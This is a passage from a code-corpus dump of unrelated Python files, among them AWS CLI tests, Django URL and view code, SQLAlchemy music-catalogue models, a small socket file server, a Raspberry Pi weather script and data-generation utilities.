monkeypatch.setattr('boto.vpc.connect_to_region', MagicMock())\n monkeypatch.setattr('boto.ec2.connect_to_region', MagicMock())\n monkeypatch.setattr('time.sleep', lambda s: None)\n sshclient = MagicMock()\n sshclient.run=lambda c: (0, b'{\"some\": \"cloud-init-result\"}', '')\n monkeypatch.setattr('aws_ami_creator.cli.sshclient_from_instance', MagicMock(return_value=sshclient))\n\n runner = CliRunner()\n\n data = {'name': 'Test AMI',\n 'base_ami': {'some-region': 'ami-123'},\n 'init_scripts': ['myscript.sh']}\n\n with runner.isolated_filesystem():\n with open('example.yaml', 'w') as fd:\n yaml.dump(data, fd)\n with open('myscript.sh', 'w') as fd:\n fd.write('echo \"Hello World!\"')\n result = runner.invoke(cli, ['create', 'some-region', 'subnet-123', 'example.yaml'], catch_exceptions=False)\n assert 'New image ID is ' in result.output\n\n\ndef test_share(monkeypatch):\n\n monkeypatch.setattr('boto.ec2.connect_to_region', MagicMock())\n\n runner = CliRunner()\n\n with runner.isolated_filesystem():\n result = runner.invoke(cli, ['share', 'some-region', 'ami-123', '123123'], catch_exceptions=False)\n assert 'OK' in result.output\n\n\n\n","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"552162960","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n@version: 1.0\n@author: wanghaiyun\n@contact: 1563713769@qq.com\n@software: PyCharm\n@file: urls.py\n@time: 2017/8/6 13:43\n\n\"\"\"\nfrom django.conf.urls import url\nfrom df_cart import views\n\nurlpatterns = [\n url(r'^cart/$', views.cart, name='cart'),\n url(r'^add(\\d+)_(\\d+)/$', views.add, name='add'),\n url(r'^edit(\\d+)_(\\d+)/$', views.edit, name='edit'),\n url(r'^delete/(\\d+)/$', views.delete, name='delete'),\n]\n","sub_path":"project/天天生鲜/bushu/dailyfresh/df_cart/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"625886344","text":"import datetime\nimport uuid\n\nfrom decorator.unique import unique\nfrom sqlalchemy import Column, ForeignKey, Table\nfrom sqlalchemy.dialects.postgresql import INTEGER, TIMESTAMP, UUID, VARCHAR, \\\n TEXT\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import backref, relationship\n\nBase = declarative_base()\n\nartists_images = Table(\n \"artists_images\",\n Base.metadata,\n Column(\"artist_id\", UUID, ForeignKey(\"artists.artist_id\")),\n Column(\"image_id\", UUID, ForeignKey(\"images.image_id\"))\n)\n\nartists_genres = Table(\n \"artists_genres\",\n Base.metadata,\n Column(\"artist_id\", UUID, ForeignKey(\"artists.artist_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\nalbums_images = Table(\n \"albums_images\",\n Base.metadata,\n Column(\"album_id\", UUID, ForeignKey(\"albums.album_id\")),\n Column(\"image_id\", UUID, ForeignKey(\"images.image_id\"))\n)\n\nalbums_genres = Table(\n \"albums_genres\",\n Base.metadata,\n Column(\"album_id\", UUID, ForeignKey(\"albums.album_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\ntracks_genres = Table(\n \"tracks_genres\",\n Base.metadata,\n Column(\"track_id\", UUID, ForeignKey(\"tracks.track_id\")),\n Column(\"genre_id\", UUID, ForeignKey(\"genres.genre_id\"))\n)\n\n\nclass Artist(Base):\n __tablename__ = \"artists\"\n\n artist_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n provider_id = Column(UUID, ForeignKey(\"providers.provider_id\"))\n provider_res_id = Column(VARCHAR)\n\n provider = relationship(\n \"Provider\",\n backref=backref(\"artists\", order_by=artist_id, lazy=\"joined\")\n )\n images = relationship(\"Image\", secondary=artists_images, lazy=\"joined\")\n genres = relationship(\"Genre\", secondary=artists_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity):\n self.artist_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n\n def __repr__(self):\n return (\"Artist(name={0},popularity={1},genres={2},images={3},\"\n \"albums={4},provider={5},provider_res_id={6})\").format(\n self.name,\n self.popularity,\n self.genres,\n self.images,\n self.albums,\n self.provider_id,\n self.provider_res_id)\n\n\nclass Album(Base):\n __tablename__ = \"albums\"\n\n album_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n artist_id = Column(UUID, ForeignKey(\"artists.artist_id\"))\n provider_id = Column(UUID, ForeignKey(\"providers.provider_id\"))\n provider_res_id = Column(VARCHAR)\n\n artist = relationship(\n \"Artist\",\n backref=backref(\"albums\", order_by=album_id, lazy=\"joined\")\n )\n provider = relationship(\n \"Provider\",\n backref=backref(\"albums\", order_by=album_id, lazy=\"joined\")\n )\n images = relationship(\"Image\", secondary=albums_images, lazy=\"joined\")\n genres = relationship(\"Genre\", secondary=albums_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity):\n self.album_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n\n def __repr__(self):\n return (\"Album(name={0},populariy={1},genres={2},images={3},\"\n \"tracks={4},provider_id={5},provider_res_id={6})\").format(\n self.name,\n self.popularity,\n self.genres,\n self.images,\n self.tracks,\n self.provider_id,\n self.provider_res_id)\n\n\nclass Track(Base):\n __tablename__ = \"tracks\"\n\n track_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR)\n popularity = Column(INTEGER)\n track_number = Column(INTEGER)\n lyric = Column(TEXT)\n album_id = Column(UUID, ForeignKey(\"albums.album_id\"))\n\n album = relationship(\n \"Album\",\n backref=backref(\"tracks\", order_by=track_id, lazy=\"joined\")\n )\n genres = relationship(\"Genre\", secondary=tracks_genres, lazy=\"joined\")\n\n def __init__(self, name, popularity, track_number):\n self.track_id = str(uuid.uuid4())\n self.name = name\n self.popularity = popularity\n self.track_number = track_number\n\n def __repr__(self):\n return (\"Track(name={0},popularity={1},track_number={2},genres={3},\"\n \"repositories={4})\").format(\n self.name,\n self.popularity,\n self.track_number,\n self.genres,\n self.repositories)\n\n\nclass Image(Base):\n __tablename__ = \"images\"\n\n image_id = Column(UUID, primary_key=True)\n width = Column(INTEGER)\n height = Column(INTEGER)\n path = Column(VARCHAR)\n\n def __init__(self, path, width, height):\n self.image_id = str(uuid.uuid4())\n self.width = width\n self.height = height\n self.path = path\n\n def __repr__(self):\n return \"Image(path={0},width={1},height={1})\".format(\n self.path, self.width, self.height)\n\n\n@unique(\n lambda name: name,\n lambda query, name: query.filter(Genre.name == name)\n)\nclass Genre(Base):\n __tablename__ = \"genres\"\n\n genre_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR, unique=True)\n\n def __init__(self, name):\n self.genre_id = str(uuid.uuid4())\n self.name = name\n\n def __repr__(self):\n return \"Genre(name={0})\".format(self.name)\n\n\n@unique(\n lambda name: name,\n lambda query, name: query.filter(Provider.name == name)\n)\nclass Provider(Base):\n __tablename__ = \"providers\"\n\n provider_id = Column(UUID, primary_key=True)\n name = Column(VARCHAR, unique=True)\n\n def __init__(self, name):\n self.provider_id = str(uuid.uuid4())\n self.name = name\n\n def __repr__(self):\n return \"Provider(name={0})\".format(self.name)\n\n\nclass Repository(Base):\n __tablename__ = \"repository\"\n\n track_id = Column(UUID, ForeignKey(\"tracks.track_id\"), primary_key=True)\n provider_id = Column(\n UUID,\n ForeignKey(\"providers.provider_id\"),\n primary_key=True\n )\n link = Column(VARCHAR)\n duration_second = Column(INTEGER)\n updated_time = Column(\n TIMESTAMP(timezone=True),\n default=datetime.datetime.now)\n\n provider = relationship(\"Provider\", backref=backref(\"repositories\"))\n track = relationship(\n \"Track\",\n backref=backref(\"repositories\", lazy=\"joined\")\n )\n\n def __init__(self, link, duration_second):\n self.link = link\n self.duration_second = duration_second\n\n def __repr__(self):\n return (\"Repository(link={0},duration_second={1},\"\n \"updated_time={2}\").format(\n self.link,\n self.duration_second,\n self.updated_time)\n","sub_path":"daemon/database/entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":6930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"89392060","text":"# -*- coding: UTF-8 -*-\nfrom socket import *\nimport pandas as pd\nimport pickle\nfrom base64 import b64decode\nfrom Crypto.Hash import SHA256\nfrom Crypto.Cipher import AES\nfrom Crypto.Random import get_random_bytes\nfrom Crypto.Util.Padding import pad\nimport json\n\nfilename = './data/EncryptedFile/EncryptedFileName.txt'\n\n\ndef find(ct_bytes):\n L1 = ct_bytes[:8]\n hash_object1 = SHA256.new(L1+b'secret')\n hashkey = hash_object1.digest()\n EncryptedFileName=open(\"./data/EncryptedFile/EncryptedFileName.txt\",\"r\")\n ans_message=''\n for t in EncryptedFileName.readlines():\n tk=b64decode(t[:-4])\n c = bytearray(len(ct_bytes))\n for i in range(len(ct_bytes)):\n c[i] = ct_bytes[i] ^ tk[i]\n L = c[:8]\n R = c[8:]\n\n hash_object = SHA256.new(L+hashkey)\n hash = hash_object.digest()\n if (hash[:8] == R) :\n file=open(\"./data/EncryptedFile/\"+t[:-1],\"r\")\n file_data=file.read()\n\n ans_message=file_data\n #print(b64decode(file_data).decode('utf-8'))\n\n file.close()\n return ans_message\n\n\nserverSocket = socket(AF_INET, SOCK_STREAM) \nserverPort = 6788\nserverSocket.bind(('', serverPort))\nserverSocket.listen(10)\nwhile True: \n print('Ready to serve...') \n connectionSocket, addr = serverSocket.accept()\n ct_bytes = connectionSocket.recv(1024)\n #print(message)\n return_message = find(ct_bytes)\n #print(return_message)\n #send_message = pickle.dumps(return_message)\n #print(send_message)\n connectionSocket.send(return_message.encode('utf-8'))\n connectionSocket.close()\n\nserverSocket.close()\n","sub_path":"2-StorageFile/FileServer.py","file_name":"FileServer.py","file_ext":"py","file_size_in_byte":1644,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"379201685","text":"from django_tables2 import SingleTableView, RequestConfig\nfrom documents.models import Document, ArchObject, DigObject\nfrom .filters import DocumentListFilter, ArchObjectListFilter, DigObjectListFilter\nfrom .tables import DocumentTable, ArchObjectTable, DigObjectTable\nfrom .forms import GenericFilterFormHelper\n\n\nclass GenericListView(SingleTableView):\n filter_class = None\n formhelper_class = None\n context_filter_name = 'filter'\n paginate_by = 25\n\n def get_queryset(self, **kwargs):\n qs = super(GenericListView, self).get_queryset()\n self.filter = self.filter_class(self.request.GET, queryset=qs)\n self.filter.form.helper = self.formhelper_class()\n return self.filter.qs\n\n def get_table(self, **kwargs):\n table = super(GenericListView, self).get_table()\n RequestConfig(self.request, paginate={\n 'page': 1, 'per_page': self.paginate_by}).configure(table)\n return table\n\n def get_context_data(self, **kwargs):\n context = super(GenericListView, self).get_context_data()\n context[self.context_filter_name] = self.filter\n return context\n\n\nclass DocumentListView(GenericListView):\n model = Document\n table_class = DocumentTable\n template_name = 'browsing/document_list_generic.html'\n filter_class = DocumentListFilter\n formhelper_class = GenericFilterFormHelper\n\n\nclass ArchObjectListView(GenericListView):\n model = ArchObject\n table_class = ArchObjectTable\n template_name = 'browsing/archobject_list_generic.html'\n filter_class = ArchObjectListFilter\n formhelper_class = GenericFilterFormHelper\n\n\nclass DigObjectListView(GenericListView):\n model = DigObject\n table_class = DigObjectTable\n template_name = 'browsing/digobject_list_generic.html'\n filter_class = DigObjectListFilter\n formhelper_class = GenericFilterFormHelper\n","sub_path":"browsing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"244615208","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom openpyxl import load_workbook\nfrom openpyxl import Workbook\nimport os\nimport datetime\nimport common\nimport china_regions_dict as CRD\n\n\nheadlist = ['客户名称', '手机号', '归属用户', '归属渠道', '客户证件类型', '客户证件号码',\n '车牌号', '车辆识别代号', '车型名称', '行驶城市', '车辆注册日期', '保险公司',\n '商业险到期日', '交强险到期日', '商业险保单号', '交强险保单号', '客户标签', '备注'\n ]\n\n# inwb = load_workbook('客户test1.xlsx')\nwb = Workbook()\n# 激活 worksheet\nws = wb.active\n# headlist分配到第一行中\nws.append(headlist)\n# 商业险到期时间=交强险到期时间\ninstime = mustime = common.endTime()\nprovince_city_district = CRD.regions()\n# 表格内容infolist\ninfolist = [common.customName(), common.customPhone(), '14100000003',\n '飞侠太保杭州', '身份证', common.customID(), common.carPlate(),\n common.vinNum(), '东风标致DC7164DB轿车', province_city_district[1],\n common.regTime(), common.companyName(),\n instime, mustime, common.policyNum(), common.policyNum(), common.customTag(), common.remarks(10)]\n\n# 附加infolist,从第一行开始附加x条数据\nif __name__ == '__main__':\n x = 10\n # NUM = input('需数据n条:')\n # print('打印%s条数据...' % NUM)\n # x = int(NUM)\n for num in range(x):\n ws.append(infolist)\n print(infolist)\n # input('Press Enter to exit...')\n\n# 保存文件\nCUS_FILE = '客户test' + datetime.datetime.now().strftime('%Y%m%d%H%M%S') + '.xlsx'\nwb.save(CUS_FILE)\n\n# BASE_DIR = os.path.dirname(__file__)\n# DC_PATH = BASE_DIR + '\\\\' + datetime.datetime.now().strftime('%Y%m%d') + '.xlsx'\n# 获取到当前文件的目录,并检查是否有该文件,如果不存在则自动新建文件\n# if not os.path.exists(DC_PATH):\n# open(DC_PATH, 'w')\n","sub_path":"TestDataBuilder/code/customer_sheet.py","file_name":"customer_sheet.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"554205090","text":"import os\nimport unittest\nimport cv2\nimport numpy as np\n\nfrom binarize_image import ImageBinarizer\n\nclass ImageBinarizerTest(unittest.TestCase):\n\t\n\tdef test_image_binarizer_returns_binarized_image(self):\n\t\tinput_file = \"./test_images/test1.jpg\"\n\t\timage = cv2.imread(input_file)\n\t\timageBinarizer = ImageBinarizer()\n\n\t\tbinarized_image = imageBinarizer.binarize(image)\n\t\tself.assertTrue(self._is_binary(binarized_image))\n\n\n\tdef test_binarize_file(self):\n\t\tinput_file = 'test_images/test5.jpg'\n\t\toutput_file = 'output_images/binarized.jpg'\n\n\t\timageBinarizer = ImageBinarizer()\n\t\timageBinarizer.binarize_file(input_file, output_file)\n\t\tself.assertTrue(os.path.exists(output_file))\n\n\n\tdef _is_binary(self, image):\n\t\treturn np.array_equal(image, image.astype(bool))\n\n\n","sub_path":"test/test_image_binarizer.py","file_name":"test_image_binarizer.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"292616292","text":"import csv\nimport os\nimport re\nimport tempfile\nfrom io import StringIO\nfrom zipfile import ZipFile\nfrom cap_sender.cap_index import CAPIndex\n\n\nclass ZipProcessor:\n \"\"\"\n Base class for handling zip files.\n \"\"\"\n zip_pattern = ''\n pdf_pattern = ''\n\n def __init__(self, filename):\n self.fn = filename\n\n @classmethod\n def match(cls, filename):\n \"\"\"\n Class method which, when the given filename\n matches cls.zip_pattern, will return the class.\n \"\"\"\n bn = os.path.basename(filename)\n if re.match(cls.zip_pattern, bn):\n return cls(filename)\n\n def transform(self):\n \"\"\"\n Method which will be called to perform transformations\n on the files belonging to this class.\n \"\"\"\n pass\n\n\nclass TransferAppDataProcessor(ZipProcessor):\n \"\"\"\n Class for handling Transfer Application Data files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Applications\\.txt'\n\n def transform(self):\n with open(self.fn, encoding='utf8') as f:\n data = f.read()\n pattern = r'custom_questions_(\\d+)_(.+?)(?=[\\t\\r\\n])'\n replacement = r'\\2_\\1'\n with open(self.fn, 'w', encoding='utf8') as f:\n f.write(re.sub(pattern, replacement, data))\n\n\nclass TransferProcessor(ZipProcessor):\n \"\"\"\n Class for handling CommonApp transfer zip files, which all need\n an index file to be generated for DIP.\n \"\"\"\n pdf_fieldnames=[]\n\n def transform(self):\n \"\"\"\n Create an `index.txt` tsv listing each pdf file and attributes\n parsed from the filename.\n \"\"\"\n with ZipFile(self.fn, 'r') as zf:\n namelist = zf.namelist()\n with StringIO(newline='') as f:\n writer = csv.DictWriter(f,\n fieldnames=self.pdf_fieldnames,\n delimiter='\\t',\n extrasaction='ignore')\n writer.writeheader()\n for fn in namelist:\n try:\n writer.writerow(re.match(self.pdf_pattern, fn).groupdict())\n except AttributeError as e:\n print(f'Error parsing filename:\\n'\n f' zipfile: {self.fn}\\n'\n f' pdf: {fn}')\n with ZipFile(self.fn, 'a') as zf:\n zf.writestr('index.txt', f.getvalue())\n\n\nclass TransferAppProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Application zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Applications\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_.+)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name']\n\n\nclass TransferEvalProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Evaluation zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_Evaluations\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_(?P\\d+)_Evaluation_(?P.+?)_.+)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name',\n 'doc_id', 'recommender']\n\n\nclass TransferTranscriptProcessor(TransferProcessor):\n \"\"\"\n TransferProcessor class for handling\n CommonApp Transfer Transcript zip files.\n \"\"\"\n zip_pattern = r'\\d+_\\d+_\\d+_TR_College_Transcript\\.zip'\n pdf_pattern = r'(?PTR_(?P\\d+)_(?P.+?)_(?P.+?)_(?P\\d+)_(?PTranscript)_(?P.+?)_(?P.+?)_(?P.+?)\\.pdf)'\n pdf_fieldnames = ['filename', 'commonapp_id', 'last_name', 'first_name',\n 'doc_id', 'doc_type', 'college_code', 'college_name',\n 'submit_dt']\n\n\nclass FreshmanProcessor(ZipProcessor):\n \"\"\"\n Class for handling CommonApp Freshman zip files, which all need\n to have the xml index file transformed into a tsv DIP index.\n \"\"\"\n def transform(self):\n temp_dir = tempfile.TemporaryDirectory()\n with ZipFile(self.fn, 'a') as zf:\n zf.extractall(temp_dir.name)\n for f in os.listdir(temp_dir.name):\n if f.endswith('.xml'):\n infile = os.path.join(temp_dir.name, f)\n outfile = infile + '.txt'\n c = CAPIndex(infile)\n c.to_csv(outfile, delimiter='\\t')\n os.remove(infile)\n with ZipFile(self.fn, 'w') as zf:\n for f in os.listdir(temp_dir.name):\n out_file = os.path.join(temp_dir.name, f)\n zf.write(out_file, f)\n\n\nclass FreshmanAppProcessor(FreshmanProcessor):\n \"\"\"\n FreshmanProcessor class for handling\n CommonApp Freshman Application zip files.\n \"\"\"\n zip_pattern = r'ugaappl_.+\\.zip'\n\n\nclass FreshmanFormsProcessor(FreshmanProcessor):\n \"\"\"\n FreshmanProcessor class for handling\n CommonApp Freshman School Forms zip files.\n \"\"\"\n zip_pattern = r'ugaapplsform_.+\\.zip'\n","sub_path":"cap_sender/cap_zips.py","file_name":"cap_zips.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"649891390","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('shop', '0006_auto_20160928_1409'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Product',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=50)),\n ('description', models.TextField()),\n ('photo', models.URLField()),\n ('price', models.PositiveIntegerField()),\n ('quantity_On_stock', models.PositiveIntegerField()),\n ('category', models.ForeignKey(to='shop.Category')),\n ],\n ),\n ]\n","sub_path":"shop/migrations/0007_product.py","file_name":"0007_product.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"499999655","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nf = open('out.txt','r')\ns = f.read().split('\\n')[:-1]\n\ny1 = []\ny2 = []\ny = []\n\nfor line in s:\n\ta,b = [float(i) for i in line.split()]\n\t#print(a,b)\n\ty1.append(a)\n\ty2.append(b)\n\ty.append(a-b)\n\t\t\nt = np.linspace(0,100,len(s))\ny1 = np.array(y1)\ny2 = np.array(y2)\ny = np.array(y)\n\nplt.subplot(3,1,1)\nplt.plot(t,y1)\nplt.ylabel('Neuron 1')\n\nplt.subplot(3,1,2)\nplt.plot(t,y2)\nplt.ylabel('Neuron 2')\n\nplt.subplot(3,1,3)\nplt.plot(t,y)\nplt.ylabel('Torque')\n\nplt.show()\n","sub_path":"Code/old_versions/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575691389","text":"import MySQLdb\nimport json\nimport requests\nimport time\n\ndef getAPI():\n db=MySQLdb.connect(host=\"localhost\", user=\"DBUSER\", passwd=\"DBPASS\", db=\"mydb\"); #connect to database and get all rows from alarm table\n cur=db.cursor(); #create cursor to populate with sql results\n nameStr=(\"Select weather_api, weather_location from pialarm_settings\");\n cur.execute(nameStr);\n curResult=cur.fetchone();\n WApi=curResult[0];\n WLoc=curResult[1];\n url=\"http://api.openweathermap.org/data/2.5/forecast?id=\"+WLoc+\"&APPID=\"+WApi\n response=requests.get(url)\n #parsed=json.loads(response.text)\n return response \n \ndef getLastWeatherTime():\n #connect to database and get all rows from alarm table\n db=MySQLdb.connect(host=\"localhost\", user=\"DBUSER\", passwd=\"DBPASS\", db=\"mydb\")\n cur=db.cursor()\n curStr=(\"SELECT last_result, result FROM pialarmweather\")\n cur.execute(curStr)\n \n if(cur.rowcount>0):\n for row in cur.fetchall():\n last_tstamp=int(row[0])\n cur_tstamp=int(round(time.time()))\n \n if((cur_tstamp-last_tstamp)>600):\n new_result=getAPI()\n new_text=new_result.text\n cur.execute(\"\"\"UPDATE pialarmweather SET result='/home/pi/Current_Weather.txt', last_result='%s'\"\"\", [cur_tstamp])\n db.commit()\n else:\n old_text=str(row[1])\n text_file=open(old_text, \"r\")\n new_text=text_file.read() \n parsed=json.loads(new_text)\n cur_temp_k=parsed['list'][0]['main']['temp']\n cur_temp_c=cur_temp_k-273.15\n return cur_temp_c \n else:\n new_result=getAPI()\n new_text=new_result.text\n\n parsed=json.loads(new_text)\n cur_temp_k=parsed['list'][0]['main']['temp']\n cur_temp_c=cur_temp_k-273.15\n\n cur_tstamp=int(round(time.time()))\n curStrOne='INSERT INTO pialarmweather (result, last_result) VALUES (\"/home/pi/Current_Weather.txt\", '+str(cur_tstamp)+')'\n\n text_file=open(\"/home/pi/Current_Weather.txt\", \"w\")\n text_file.write(new_text)\n text_file.close()\n cur.execute(\"\"\"INSERT INTO pialarmweather VALUES(null, '/home/pi/Current_Weather.txt', '%s');\"\"\", [cur_tstamp])\n db.commit()\n return cur_temp_c \n","sub_path":"piweather.py","file_name":"piweather.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"653042884","text":"import math\n\nresult = []\nbase = 2\nregister = base\n\nnum = list(range(3, 100))\n\nwhile num:\n while register < 100:\n if register in num:\n num.remove(register)\n register = register + base\n print(register)\n result.append(base)\n base = num[0]\n register = base\n del num[0]\n print(str(len(result)) + \" = len\")\n\n print (result)\n\n\nresult.append(base)\nprint(result[-1])\n\n#NoNo......Failed....\n'''result = [2]\ntmp = []\ni = 1\n\n\nwhile True:\n print(result)\n i = i + 2\n Range = range(3, math.sqrt(i) -1)\n for n in Range:\n if i % n == 0:\n break\n result.append(i)\n if len(result) == 10001:\n print(result[-1])\n break'''\n\n\n\n\n\n\n","sub_path":"Euiller007.py","file_name":"Euiller007.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"575602447","text":"# -*- coding = utf-8 -*-\r\n# @Time: 23:45\r\n# @Author:LEE\r\n# @Software:PyCharm\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n# 导入逻辑回归模型函数库\r\nfrom sklearn.linear_model import LogisticRegression\r\n\r\n\r\ndef sigmoid(z):\r\n phi_z = 1.0 / (1.0 + np.exp(-z))\r\n return phi_z\r\n\r\n\r\ndef plt_sigmoid(data, w):\r\n # 其拟合方程形式为f(x)=w0+w1*x1+w2*x2....\r\n # 生成两个矩阵\r\n data = np.mat(data)\r\n w = np.array(w)\r\n z = data * np.transpose(w) # 矩阵转置,相乘后得到z值\r\n z.sort(axis=0)\r\n\r\n # 画sigmoid函数\r\n phi_z = sigmoid(z)\r\n plt.plot(z, phi_z)\r\n plt.axvline(0.0, color='k')\r\n plt.axhspan(0.0, 1.0, facecolor='1.0', alpha=1.0, ls='dotted')\r\n plt.yticks([0.0, 0.5, 1.0])\r\n plt.ylim(-0.1, 1.1)\r\n plt.xlabel('z')\r\n plt.ylabel('$\\phi (z)$')\r\n plt.show()\r\n\r\n\r\n# 训练效果可视化\r\ndef train_plt(data, label, lr_clf):\r\n plt.figure()\r\n plt.scatter(data[:, 0], data[:, 1], s=50, c=label, cmap='viridis')\r\n # 可视化决策边界\r\n nx, ny = 200, 100\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n x_grid, y_grid = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n z_proba = lr_clf.predict_proba(np.c_[x_grid.ravel(), y_grid.ravel()])\r\n z_proba = z_proba[:, 1].reshape(x_grid.shape)\r\n\r\n plt.contour(x_grid, y_grid, z_proba, [0.5], colors='blue', linewidths=3)\r\n plt.show()\r\n\r\n\r\n# 可视化预测新样本\r\ndef test_plt(data, label, lr_clf):\r\n plt.figure()\r\n print(\"请输入要预测点的坐标:\")\r\n x = int(input(\"x=\"))\r\n y = int(input(\"y=\"))\r\n new_point1 = np.array([[x, y]])\r\n plt.scatter(new_point1[:, 0], new_point1[:, 1], cmap='viridis', s=50)\r\n plt.annotate(s='the new point 1', xy=(0, -1), xytext=(-2, 0), color='blue',\r\n arrowprops=dict(arrowstyle='-|>', connectionstyle='arc3', color='red'))\r\n plt.scatter(data[:, 0], data[:, 1], s=50, c=label, cmap='viridis')\r\n plt.title('Dataset')\r\n\r\n # 可视化决策边界\r\n nx, ny = 200, 100\r\n x_min, x_max = plt.xlim()\r\n y_min, y_max = plt.ylim()\r\n x_grid, y_grid = np.meshgrid(np.linspace(x_min, x_max, nx), np.linspace(y_min, y_max, ny))\r\n z_proba = lr_clf.predict_proba(np.c_[x_grid.ravel(), y_grid.ravel()])\r\n z_proba = z_proba[:, 1].reshape(x_grid.shape)\r\n plt.contour(x_grid, y_grid, z_proba, [0.5], colors='blue', linewidths=3)\r\n plt.show()\r\n\r\n\r\ndef exe4(clusterAssment):\r\n # 构造数据集\r\n df = pd.read_table(\"teacher_data.txt\", header=None, sep='\\t')\r\n df.columns = ['x', 'y']\r\n data = df.values.tolist() # 把dataframe数据转变为list类型\r\n data = np.array(data)\r\n # 给数据源打标签\r\n label = []\r\n for i in range(len(clusterAssment)):\r\n label.append(clusterAssment[i][0])\r\n label = np.array(label)\r\n\r\n # 调用逻辑回归模型,并拟合所构造的数据集\r\n lr_clf = LogisticRegression()\r\n lr_clf = lr_clf.fit(data, label) # 其拟合方程形式为f(x)=w0+w1*x1+w2*x2\r\n\r\n # 学习并画出sigmoid函数\r\n w = lr_clf.coef_ # 使用coef_ 查看对应模型的系数w\r\n plt_sigmoid(data, w)\r\n\r\n # 可视化模型\r\n train_plt(data, label, lr_clf)\r\n\r\n # 用学习好的模型对(2,6)分类。\r\n # 可视化预测点\r\n test_plt(data, label, lr_clf)\r\n","sub_path":"Experience4/exe4.py","file_name":"exe4.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370333101","text":"f = open('temp.txt','r')\r\nprint(f.read())\r\nf.seek(0)\r\nstr_num = f.readline()\r\nlist_num = str_num.split(' ')\r\ndel list_num[-1]\r\nnum =[int(i) for i in list_num]\r\nday_max = num.index(max(num))+1\r\nday_min = num.index(min(num))+1\r\nprint('本周气温最高是第',day_max,'天,气温最低是第',day_min,'天.')\r\n\r\n","sub_path":"Python/文件操作/找出文件内容中的最高最低值(气温最高与最低).py","file_name":"找出文件内容中的最高最低值(气温最高与最低).py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"155729009","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contato',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('nome_completo', models.CharField(max_length=50)),\n ('data_nascimento', models.DateField(verbose_name=b'Data de Nascimento')),\n ],\n ),\n migrations.CreateModel(\n name='Telefones',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 